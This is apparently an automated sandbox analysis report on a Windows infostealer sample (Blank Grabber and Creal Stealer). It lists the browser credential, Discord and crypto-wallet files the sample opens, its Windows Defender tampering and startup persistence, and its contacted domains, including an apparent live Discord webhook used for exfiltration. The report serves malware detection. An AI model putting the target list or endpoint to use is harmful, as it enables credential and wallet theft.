              Source: Yara matchFile source: 00000019.00000002.3354239060.00000227B8F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\Creal.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Tries to steal communication platform credentials (via file / registry access)
              Source: C:\Users\user\Desktop\Creal.exeFile opened: C:\Users\user\AppData\Local\DiscordJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeFile opened: C:\Users\user\AppData\Local\DiscordCanaryJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeFile opened: C:\Users\user\AppData\Local\DiscordPTBJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeFile opened: C:\Users\user\AppData\Local\DiscordDevelopmentJump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Local\Discord
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Local\DiscordCanary
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Local\DiscordPTB
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile opened: C:\Users\user\AppData\Local\DiscordDevelopment
              Source: Yara matchFile source: Process Memory Space: Built.exe PID: 2536, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000003.00000003.2109058666.00000124EBC34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2109058666.00000124EBC32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Built.exe PID: 2760, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Built.exe PID: 2536, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI27602\rarreg.key, type: DROPPED
              Yara detected Creal Stealer
              Source: Yara matchFile source: 00000019.00000002.3354239060.00000227B8F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A1F6674 PyFloat_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyObject_CheckBuffer,PyErr_Format,sqlite3_bind_null,PyObject_GetBuffer,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,sqlite3_bind_blob,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyFloat_AsDouble,PyErr_Occurred,sqlite3_bind_double,PyErr_Occurred,sqlite3_bind_int64,5_2_00007FFD8A1F6674
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A1F49F0 PyEval_SaveThread,sqlite3_bind_parameter_count,PyEval_RestoreThread,PyTuple_Type,sqlite3_bind_parameter_name,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,PyTuple_Pack,PyDict_GetItemRef,_Py_Dealloc,PyObject_GetOptionalAttr,PyObject_GetOptionalAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyType_IsSubtype,PyObject_CheckBuffer,PyObject_GetBuffer,sqlite3_bind_blob,PyBuffer_Release,PyEval_SaveThread,sqlite3_bind_parameter_name,PyEval_RestoreThread,PyMapping_GetOptionalItemString,sqlite3_bind_null,PyFloat_AsDouble,sqlite3_bind_double,PyList_GetItem,PyExc_DeprecationWarning,PyErr_WarnFormat,PyErr_GetRaisedException,sqlite3_db_handle,_PyErr_ChainExceptions1,PyObject_CallOneArg,_Py_Dealloc,PyErr_Occurred,PyErr_Occurred,PyErr_Format,PyObject_CallOneArg,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,PyExc_OverflowError,PyErr_SetString,PySequence_Check,PyTuple_Type,PyErr_GetRaisedException,sqlite3_db_handle,_PyErr_ChainExceptions1,PySequence_Size,PyErr_Format,PyErr_Occurred,PyErr_Format,PyErr_Format,PyErr_SetString,PySequence_GetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyExc_LookupError,PyErr_ExceptionMatches,_Py_Dealloc,_Py_Dealloc,PyObject_CallOneArg,_Py_Dealloc,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,_Py_Dealloc,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,5_2_00007FFD8A1F49F0

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Exploitation for Privilege Escalation              		3
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Native API              		12
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory3
              File and Directory Discovery              		Remote Desktop Protocol3
              Data from Local System              		22
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts12
              Command and Scripting Interpreter              		Logon Script (Windows)11
              Process Injection              		21
              Obfuscated Files or Information              		Security Account Manager45
              System Information Discovery              		SMB/Windows Admin Shares1
              Email Collection              		2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook12
              Registry Run Keys / Startup Folder              		21
              Software Packing              		NTDS131
              Security Software Discovery              		Distributed Component Object ModelInput Capture3
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp              		LSA Secrets2
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials41
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
              Virtualization/Sandbox Evasion              		Proc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553259 Sample: #U0416#U0430#U0440#U043a#U0... Startdate: 10/11/2024 Architecture: WINDOWS Score: 100 100 geolocation-db.com 2->100 102 blank-v1rwt.in 2->102 104 4 other IPs or domains 2->104 140 Found malware configuration 2->140 142 Multi AV Scanner detection for submitted file 2->142 144 Yara detected Creal Stealer 2->144 148 5 other signatures 2->148 11 #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe 7 2->11         started        14 Creal.exe 2->14         started        signatures3 146 Tries to detect the country of the analysis system (by using the IP) 100->146 process4 file5 86 C:\Users\user\Desktop\Creal.exe, PE32+ 11->86 dropped 88 C:\Users\user\Desktop\Built.exe, PE32+ 11->88 dropped 16 Built.exe 22 11->16         started        20 Creal.exe 115 11->20         started        90 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 14->90 dropped 92 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 14->92 dropped 94 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 14->94 dropped 96 66 other files (none is malicious) 14->96 dropped 22 Creal.exe 14->22         started        process6 file7 70 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 16->70 dropped 72 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 16->72 dropped 74 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 16->74 dropped 82 16 other files (none is malicious) 16->82 dropped 120 Modifies Windows Defender protection settings 16->120 122 Adds a directory exclusion to Windows Defender 16->122 124 Removes signatures from Windows Defender 16->124 24 Built.exe 16->24         started        76 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 20->76 dropped 78 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 20->78 dropped 80 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 20->80 dropped 84 66 other files (none is malicious) 20->84 dropped 126 Drops PE files to the startup folder 20->126 28 Creal.exe 7 20->28         started        128 Tries to harvest and steal browser information (history, passwords, etc) 22->128 130 Tries to steal communication platform credentials (via file / registry access) 22->130 132 Tries to steal Crypto Currency Wallets 22->132 31 cmd.exe 22->31         started        signatures8 process9 dnsIp10 106 ip-api.com 208.95.112.1, 49700, 80 TUT-ASUS United States 24->106 150 Found many strings related to Crypto-Wallets (likely being stolen) 24->150 152 Modifies Windows Defender protection settings 24->152 154 Adds a directory exclusion to Windows Defender 24->154 156 Removes signatures from Windows Defender 24->156 33 cmd.exe 1 24->33         started        36 cmd.exe 1 24->36         started        38 cmd.exe 24->38         started        40 cmd.exe 24->40         started        108 geolocation-db.com 159.89.102.253, 443, 49713, 49719 DIGITALOCEAN-ASNUS United States 28->108 110 api.ipify.org 104.26.12.205, 443, 49706, 49714 CLOUDFLARENETUS United States 28->110 112 api.gofile.io 45.112.123.126, 443, 49707, 49812 AMAZON-02US Singapore 28->112 98 C:\Users\user\AppData\Roaming\...\Creal.exe, PE32+ 28->98 dropped 158 Tries to steal communication platform credentials (via file / registry access) 28->158 160 Tries to steal Crypto Currency Wallets 28->160 42 cmd.exe 28->42         started        44 conhost.exe 31->44         started        46 curl.exe 31->46         started        file11 signatures12 process13 signatures14 134 Modifies Windows Defender protection settings 33->134 136 Adds a directory exclusion to Windows Defender 33->136 138 Removes signatures from Windows Defender 33->138 48 powershell.exe 23 33->48         started        51 conhost.exe 33->51         started        53 powershell.exe 36->53         started        55 conhost.exe 36->55         started        57 MpCmdRun.exe 36->57         started        64 2 other processes 38->64 66 2 other processes 40->66 59 curl.exe 42->59         started        62 conhost.exe 42->62         started        process15 dnsIp16 118 Loading BitLocker PowerShell Module 53->118 68 WmiPrvSE.exe 53->68         started        114 ifconfig.me 34.160.111.145, 49703, 49794, 80 ATGS-MMD-ASUS United States 59->114 116 127.0.0.1 unknown unknown 59->116 signatures17 process18

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe32%ReversingLabsWin64.Trojan.ReverseShell

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\python312.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI27602\unicodedata.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD4.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD5.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA1.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA224.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA256.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA384.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA512.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_keccak.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_poly1305.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Math\_modexp.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_curve25519.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_curve448.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ec_ws.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ed25519.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ed448.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Util\_cpuid_c.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Util\_strxor.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\VCRUNTIME140_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_asyncio.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_cffi_backend.cp313-win_amd64.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_multiprocessing.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_overlapped.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_uuid.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\_wmi.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\pyexpat.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\python3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\python313.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI42362\unicodedata.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://repository.swisssign.com/C0%Avira URL Cloudsafe
              https://en.wikipeT0%Avira URL Cloudsafe
              https://setuptools.pypa.io/en/latest/00%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ip-api.com
              		208.95.112.1
              		truefalse
                		high
                api.ipify.org
                		104.26.12.205
                		truefalse
                  		high
                  geolocation-db.com
                  		159.89.102.253
                  		truefalse
                    		high
                    ifconfig.me
                    		34.160.111.145
                    		truefalse
                      		high
                      api.gofile.io
                      		45.112.123.126
                      		truefalse
                        		high
                        blank-v1rwt.in
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://ifconfig.me/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://github.com/Blank-c/BlankOBFBuilt.exe, 00000004.00000003.2125669838.000002D966CA9000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2125383539.000002D967B3D000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2124952613.000002D966CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://discord.com/api/webhooks/1304534397680357396/jwWT3Q8Ovv9Vvgd-RNJrwcYvcpgO5pbMYyd8C4eotXdFUJqBuilt.exe, 00000004.00000002.2170655566.000002D967C30000.00000004.00001000.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://repository.swisssign.com/CCreal.exe, 00000005.00000003.2402674199.00000203E77B0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375493064.00000203E77B0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2418580298.00000203E77B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.com/astral-sh/ruffCreal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesCreal.exe, 00000005.00000002.2418294898.00000203E76A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svgCreal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://coinbase.com)Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://geolocation-db.com/jsonp/NonePCreal.exe, 00000005.00000002.2416296519.00000203E6F10000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/python/importlib_metadata/issuesCreal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://tiktok.com)Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              http://repository.swisssign.com/0Creal.exe, 00000005.00000003.2414506269.00000203E77EE000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374358999.00000203E77E8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374144942.00000203E77BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2418580298.00000203E77EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://discord.com)Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
